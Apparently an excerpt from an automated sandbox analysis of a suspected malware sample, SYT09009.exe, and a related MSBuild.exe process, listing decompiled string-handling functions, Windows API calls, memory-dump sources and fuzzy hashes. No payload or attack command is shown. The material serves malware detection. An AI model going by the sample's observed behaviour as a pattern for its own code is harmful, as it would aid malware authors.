Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AD6(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405ad7
0x00405ae1
0x00405ae3
0x00405aea
0x00405af2
0x00000000
0x00000000
0x00000000
0x00405af2
0x00405af4
0x00405af9

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SYT09009.exe,C:\Users\user\Desktop\SYT09009.exe,80000000,00000003), ref: 00405ADC
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SYT09009.exe,C:\Users\user\Desktop\SYT09009.exe,80000000,00000003), ref: 00405AEA

Strings

C:\Users\user\Desktop, xrefs: 00405AD6

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-1246513382
Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD

Uniqueness

Uniqueness Score: -1.00%

Function 00405BF5, Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BF5(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405c05
0x00405c07
0x00405c0a
0x00405c36
0x00405c0f
0x00405c18
0x00405c1d
0x00405c28
0x00405c2b
0x00405c47
0x00405c2d
0x00405c34
0x00000000
0x00405c34
0x00405c40
0x00405c44
0x00405c44
0x00405c3e
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C1D
CharNextA.USER32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C2E
lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction ID: 0c44f0240925c5b75b39479a83fd13515cb2c3d3321eb5bdfbc953cb3faf5d46
Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
Instruction Fuzzy Hash: FBF0F631105A18FFDB12DFA4CD00D9EBBA8EF55350B2540B9E840F7210D634DE01AFA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exe PID: 5868 Parent PID: 904 MSBuild.exeCOMMON

Executed Functions

Function 012AA533, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 012AA5E9

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b5153c68dfa8c3f1bec4ab23892c212d8a7934bb7387a85105da0a8170bf6c24
Instruction ID: 1af8397401509e2465af361519ead2f9d022252d3e2f431ff741d57673f74e48
Opcode Fuzzy Hash: b5153c68dfa8c3f1bec4ab23892c212d8a7934bb7387a85105da0a8170bf6c24
Instruction Fuzzy Hash: 6B3190B1504380AFE722CF69DC44B66BFF8EF46314F08849AE9849B252D375A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 012AA56A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 012AA5E9

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 469ab86f7be0d444c761c52917ed7c86e2e55341c44ab51896a983d4d772c410
Instruction ID: 2c966716c2699b3a7f3bf071762dc97961d87e4db6c7cce7dfb209bbe74fdf65
Opcode Fuzzy Hash: 469ab86f7be0d444c761c52917ed7c86e2e55341c44ab51896a983d4d772c410
Instruction Fuzzy Hash: 1921B071500240AFEB21CF69DC85B66FBE8EF04710F08846DEA858B242D771E404CF75

Uniqueness

Uniqueness Score: -1.00%

Function 012AA640, Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,41EF9E87,00000000,00000000,00000000,00000000), ref: 012AA6D5

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 3353f519276b727c75ada6669d94266dede040ee38205e7c65ccb2b381006c7d
Instruction ID: 7c37d374d810fc34da53b34dbaf87c89e5cfa0c0a8bd9afe81307a2230f9d15c
Opcode Fuzzy Hash: 3353f519276b727c75ada6669d94266dede040ee38205e7c65ccb2b381006c7d
Instruction Fuzzy Hash: 29210AB54087806FE7128B25DC41BA7BFB8EF46720F08859AED858B153D324A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 012AA710, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,41EF9E87,00000000,00000000,00000000,00000000), ref: 012AA7A1

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 9bf91c3ac3c1f625c3196be33aa5b0595256564e157e10e199c6e680f735bd9d
Instruction ID: cb74afbb65fc48f9d341eab5af77a97878339cc7771aa1a4a068144e9683c8fd
Opcode Fuzzy Hash: 9bf91c3ac3c1f625c3196be33aa5b0595256564e157e10e199c6e680f735bd9d
Instruction Fuzzy Hash: 7321A471409380AFD7228F65DC84F56BFB8EF46314F08849BEA859F153C365A409CB71

Uniqueness

Uniqueness Score: -1.00%

Function 012AAC1C, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 012AACB2

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: LanguageName
String ID:
API String ID: 2060303382-0
Opcode ID: 591462b041d1e472e91db3189d408da811c14b890a3ce74ec9753b665a97d056
Instruction ID: 2cdd40c67924aa61c5df26f3072f82eb7b783c95bab03a51804faf96e1115cd4
Opcode Fuzzy Hash: 591462b041d1e472e91db3189d408da811c14b890a3ce74ec9753b665a97d056
Instruction Fuzzy Hash: BC2192754093806FD3138B25DC51B62BFB8EF97B20F0981DBE9848B553D224A919CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 012AA7EB, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 012AA863

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: FileInfoSizeVersion
String ID:
API String ID: 1661704012-0
Opcode ID: 025c9f62c7a6bf9740d1331cdb812a4bfbf653d6668fbcbedc2257f889a07ed7
Instruction ID: 54c6a5e76789adc9763add8e522ecefe1aa1533718ce3fb8a1ac9364d6070f41
Opcode Fuzzy Hash: 025c9f62c7a6bf9740d1331cdb812a4bfbf653d6668fbcbedc2257f889a07ed7
Instruction Fuzzy Hash: 9B21CD758083C45FEB12CB29DC45B92BFE8EF06324F0980EAED848F253D3659909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012AA336, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 012AA39C

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 126a892fc11d80fe7b9b1731f9b1f13b002e0f5d89ef881d21117b2c99d2e29c
Instruction ID: 28ef2e3ab2975b4469a4c4a01abfbb8b3767b4a38013e7d75df0b61b95172837
Opcode Fuzzy Hash: 126a892fc11d80fe7b9b1731f9b1f13b002e0f5d89ef881d21117b2c99d2e29c
Instruction Fuzzy Hash: 99219D755093C09FD7128F25DC44652BFB4EF02220F0984EBED85CF163C278A848CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012AA1F4, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 012AA269

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 2a1f65a90c93e65fe169e4d4528df47354325276550adca38a80255a9bed632b
Instruction ID: b391dc83aaa6ddae6448f73408545a50545fb316f1b5275697db6721e4486e32
Opcode Fuzzy Hash: 2a1f65a90c93e65fe169e4d4528df47354325276550adca38a80255a9bed632b
Instruction Fuzzy Hash: 18216A7640E3C09FD7138B65D895642BFB4EF53220F0E81DBD9848F1A3D369A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012AA742, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,41EF9E87,00000000,00000000,00000000,00000000), ref: 012AA7A1

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 8f3d98349b11b9bb434793170d126544d8ddfb6a3ea09cd7b591545c7d93481d
Instruction ID: d91ea28c6767144df60a04d2b29be7d563a098a0a8fe685cfe7fb91849787952
Opcode Fuzzy Hash: 8f3d98349b11b9bb434793170d126544d8ddfb6a3ea09cd7b591545c7d93481d
Instruction Fuzzy Hash: 861191B1510204AFEB21CF59DC85FABFFA8EF44720F14846AEE469B252C775A404CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 012AA8B4, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 012AA919

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: FileInfoVersion
String ID:
API String ID: 2427832333-0
Opcode ID: 28b7e0855e0113df666b9f9467bddcc1a9a9a59adeafc06f1aace68d53fdef10
Instruction ID: f48a9fb525fc269efe0a9a7356792ffaf2f74fe2556bdcd6a05db500a744b3df
Opcode Fuzzy Hash: 28b7e0855e0113df666b9f9467bddcc1a9a9a59adeafc06f1aace68d53fdef10
Instruction Fuzzy Hash: F411D076504385AFDB228F19DC40B62FFB8EF45224F09809EED858B653D221A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012AA3E3, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 012AA448

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 083d1d2d5bea11721d96ad0c60203c6b0802d8c1575de8691907b39d70a1eee6
Instruction ID: f003d426899698920d824db643ff06aacdb38967867e543ac87b3bace4db9c57
Opcode Fuzzy Hash: 083d1d2d5bea11721d96ad0c60203c6b0802d8c1575de8691907b39d70a1eee6
Instruction Fuzzy Hash: 18118B7540D3C49FEB138B259C84762BFB4DF43214F0980CAED858B2A3D2696909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 012AA682, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,41EF9E87,00000000,00000000,00000000,00000000), ref: 012AA6D5

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: b4a2a3ab50393d5101636fb0a80f3efdb1fdaaca6b42d496234ec88827626385
Instruction ID: 4db4c131b997209e4c1fccf7dc70657644d9a6d6f97c5f211cc0066a34197713
Opcode Fuzzy Hash: b4a2a3ab50393d5101636fb0a80f3efdb1fdaaca6b42d496234ec88827626385
Instruction Fuzzy Hash: 3C01D6B5510204AFE710DF59DC85B6AFFA8DF44720F14C056EE459B241D774A904CEB1

Uniqueness

Uniqueness Score: -1.00%

Function 012AA8D6, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 012AA919

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: FileInfoVersion
String ID:
API String ID: 2427832333-0
Opcode ID: 14d632f07eed4e96d048aedf158910d57208b3f6e617fe7a28a52717f807a2a0
Instruction ID: f02a221ed3a8be45e1f6879474b228362df0dbf905e7575a7ac33ec1d5aabd22
Opcode Fuzzy Hash: 14d632f07eed4e96d048aedf158910d57208b3f6e617fe7a28a52717f807a2a0
Instruction Fuzzy Hash: D30192755102469FDB208F19D845B66FFE4EF44320F08C06AEE458B652D275E418CF62

Uniqueness

Uniqueness Score: -1.00%

Function 012AA826, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 012AA863

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: FileInfoSizeVersion
String ID:
API String ID: 1661704012-0
Opcode ID: adcb8a20ef2f125179baf497edd11f334f3a59b817e4088dff14abd33dd66532
Instruction ID: f3eee97240c3d50ae0403436dfa522713bd765a801d1c48540c639aaa38ceb3e
Opcode Fuzzy Hash: adcb8a20ef2f125179baf497edd11f334f3a59b817e4088dff14abd33dd66532
Instruction Fuzzy Hash: 1201B1719102419FEB10CF1AD885766FFE4EF44320F08C4AADD488B242D374E405CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012AA36A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 012AA39C

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0637ddda15be60347f8e430df9f3e9db4aa0cf46533b8730c20f005b89b86e5c
Instruction ID: 40b5875283d862c30b1f44fd860fa90e375ea27fc4faadee2a0fecd4d6049e3c
Opcode Fuzzy Hash: 0637ddda15be60347f8e430df9f3e9db4aa0cf46533b8730c20f005b89b86e5c
Instruction Fuzzy Hash: FF018F759253459FDB118F29E88576AFBA4EF44321F08C4AAED498F242D3B5A404CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 012AAC62, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 012AACB2

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: LanguageName
String ID:
API String ID: 2060303382-0
Opcode ID: d70ed319d7f8de9cfea1575d583ae13aac871dba6bf5ea382246073b05985ee6
Instruction ID: f6bb19e844edd8349bedc1c51307be0ca6a1e2167e4cabc4867c1db44467a699
Opcode Fuzzy Hash: d70ed319d7f8de9cfea1575d583ae13aac871dba6bf5ea382246073b05985ee6
Instruction Fuzzy Hash: 2301A272500200ABD210DF1ADC86B26FBE8FB98B20F14811AED085B745E735F515CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 012AA416, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 012AA448

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c874a240bb8ac4aeba90b8198423b6ce6688ed854bd29ef0173b9c6889209864
Instruction ID: 5bc04c3e3d263cde3bdeff5b951f4f244a553139e69dce02c97a8ceac93b1c6e
Opcode Fuzzy Hash: c874a240bb8ac4aeba90b8198423b6ce6688ed854bd29ef0173b9c6889209864
Instruction Fuzzy Hash: 4DF0C874420644DFDB10CF19D889765FFA4DF44720F48C09AED494B352D379A848CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 012AA23A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 012AA269

Memory Dump Source

Source File: 00000006.00000002.256614454.00000000012AA000.00000040.00000001.sdmp, Offset: 012AA000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: f9487dc71d249e665b18509a4835d562a7a62d21cd417541bbeea42419b84448
Instruction ID: 6007135ad88c63dc9f1d892fbcc81e0d896ba514e9931f1881830864baa6cf6b
Opcode Fuzzy Hash: f9487dc71d249e665b18509a4835d562a7a62d21cd417541bbeea42419b84448
Instruction Fuzzy Hash: 5DF0C2758242448FDB11CF19D885761FFA4EF44720F48C0AADE494F342D3BAA554CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 02E41DF8, Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9637a8bd53652f166e8ff758d66358b2a965658def8b9eae5ba7a9eda180aab1
Instruction ID: c4df83390988d90ee902494e2850d2fa4e3c66f7fe4d1edd7b57f5790372573e
Opcode Fuzzy Hash: 9637a8bd53652f166e8ff758d66358b2a965658def8b9eae5ba7a9eda180aab1
Instruction Fuzzy Hash: 1BF19134600615CFCB14DF68E488A69BBF6FF84314F46C4A9E8098B659DB70FC85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02E42660, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a8346dfb9c79c4eaba280009ba454da04f2ccfa41f51f22df20658a2f6423f
Instruction ID: 10826481ee20d44c861e818d6384ec925bcce8093952e27a89dea8d688e5c480
Opcode Fuzzy Hash: b6a8346dfb9c79c4eaba280009ba454da04f2ccfa41f51f22df20658a2f6423f
Instruction Fuzzy Hash: 4A71AF30B40210DFD7259B68E898B6AB7A1EF88314F11D469FA469B691CF34EC45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E41860, Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf7a86f987843bfe56f34c4410e8a7ce62f518d2ef1015eaff0bb5db4f79385
Instruction ID: 977e36b5d1ef04186489829e6ded164f2877f9ebcfa48476429c49d3470ab311
Opcode Fuzzy Hash: 8cf7a86f987843bfe56f34c4410e8a7ce62f518d2ef1015eaff0bb5db4f79385
Instruction Fuzzy Hash: 4861E0307402858FCB11DF68E884BAE7BF6AF85350F0984AAE559CF291DB34ED85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02E406C8, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e40d92f40e44bfed05fee51e1f0f595a3dc9cd0a39073aac6d7927c7a33b79b
Instruction ID: 2f06759add6d19cf76160c0a16a53532ca48e5857908a99b4768a4fe41249188
Opcode Fuzzy Hash: 8e40d92f40e44bfed05fee51e1f0f595a3dc9cd0a39073aac6d7927c7a33b79b
Instruction Fuzzy Hash: 0A518030B802119FEB08DB68D884BAEB7E2FB88310F11D579EA55DB290DB349C41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E40006, Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2139df0a2c35c4699f2d4b4d3a2d6477f08f81c5e0af88aa346b81b6894d019d
Instruction ID: a93147ea259d1f4e45ad8b7a623241781e0799757efda3a26b8c8d9a2922cb5a
Opcode Fuzzy Hash: 2139df0a2c35c4699f2d4b4d3a2d6477f08f81c5e0af88aa346b81b6894d019d
Instruction Fuzzy Hash: 0731B46054C3C18FC3069B38D8556663FB1FF53304F4A49EAD085CF2A3EA299C4ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 02E41C41, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe7571c53fa330edb399f5d2d60892e7ab8166249cda6062f8f623cec485885
Instruction ID: feb2f5c746b866bfc397192bd2fc3623baef7c79ef3430852d6b0dcc7132795c
Opcode Fuzzy Hash: 0fe7571c53fa330edb399f5d2d60892e7ab8166249cda6062f8f623cec485885
Instruction Fuzzy Hash: 48316B70B50104DFCB08DB78E4546AE7BF2BF89315F218169E116DB3A0DF319C458B41

Uniqueness

Uniqueness Score: -1.00%

Function 02E4014F, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2583bf2c4b1573cca7bfdb2ca6f7fcf5de922c18529c81692e1e1882c0feac2d
Instruction ID: dc6a8b8d1aca839bb200a7d6990d5ab58eb86fec947db88744e363bdf419f6ec
Opcode Fuzzy Hash: 2583bf2c4b1573cca7bfdb2ca6f7fcf5de922c18529c81692e1e1882c0feac2d
Instruction Fuzzy Hash: C3213376E14108AFDB15DFA6F8989DEBFBAFF88314F04812AE505F3254DA3059018B61

Uniqueness

Uniqueness Score: -1.00%

Function 02E40521, Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af21183f04857ad68cfe34165c8e9378c84aaf24e731a0039c7acf93d566919
Instruction ID: c8502c9c1228592aad8a47b12f88d53e4c81d845f44f38782812531e82385ea1
Opcode Fuzzy Hash: 9af21183f04857ad68cfe34165c8e9378c84aaf24e731a0039c7acf93d566919
Instruction Fuzzy Hash: 32113A303801508FC759BB3CE468A3D3AE7BFC6705B2440B8D546CF7A5DE299C428791

Uniqueness

Uniqueness Score: -1.00%

Function 02E40530, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8dc3a61e2a7f0afa6856624bc9b815fbef99ec7554d95cc3b66f362a8d6c9fc
Instruction ID: ccdb801f3ed4e4c09517f68cd0c2407410d36235e40edfbd2e94f2711a4b2a5c
Opcode Fuzzy Hash: f8dc3a61e2a7f0afa6856624bc9b815fbef99ec7554d95cc3b66f362a8d6c9fc
Instruction Fuzzy Hash: BE11E9303801608FC759AB3DD068A3E3AE7BFC5715B2444B8D506CF7A1DE699C419792

Uniqueness

Uniqueness Score: -1.00%

Function 02E420C0, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d187d7cefd3648a9607d053253a2f6e181e4d22241c3491b16f97edbecbc9a
Instruction ID: c642e909e043a95abdbdd2397a739155cebf5b9d04de4cad859e01a1a465b9fe
Opcode Fuzzy Hash: 81d187d7cefd3648a9607d053253a2f6e181e4d22241c3491b16f97edbecbc9a
Instruction Fuzzy Hash: 18110831B802018FDB20AA35F8487A677A6AFC4311F058176EE0AC7249DF748C44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 02E40630, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256789638.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cedf441bf5cf0aa590010ad1c5f19eabb47b66b63e16f4a19ac1e9766bd5c3e
Instruction ID: 8c56044576fb8bfdbb563374cc08d263753b38e43da6231dd21a243faecd3e3f
Opcode Fuzzy Hash: 6cedf441bf5cf0aa590010ad1c5f19eabb47b66b63e16f4a19ac1e9766bd5c3e
Instruction Fuzzy Hash: F1018B327502128FC719AB39E45C66D3BE7EFC9721B1940B9E206DB258DF208C028742

Uniqueness

Uniqueness Score: -1.00%

Function 012E05D0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.256653832.00000000012E0000.00000040.00000040.sdmp, Offset: 012E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 991071fe5e29086418ac8c0666547130f2df7e5707456da5278cbf8ed31dca45
Instruction ID: 80df145bb06bc1c84c2a672eef2866e2fcf8aa8b0c4b53b6699f139c5556af96
Opcode Fuzzy Hash: 991071fe5e29086418ac8c0666547130f2df7e5707456da5278cbf8ed31dca45
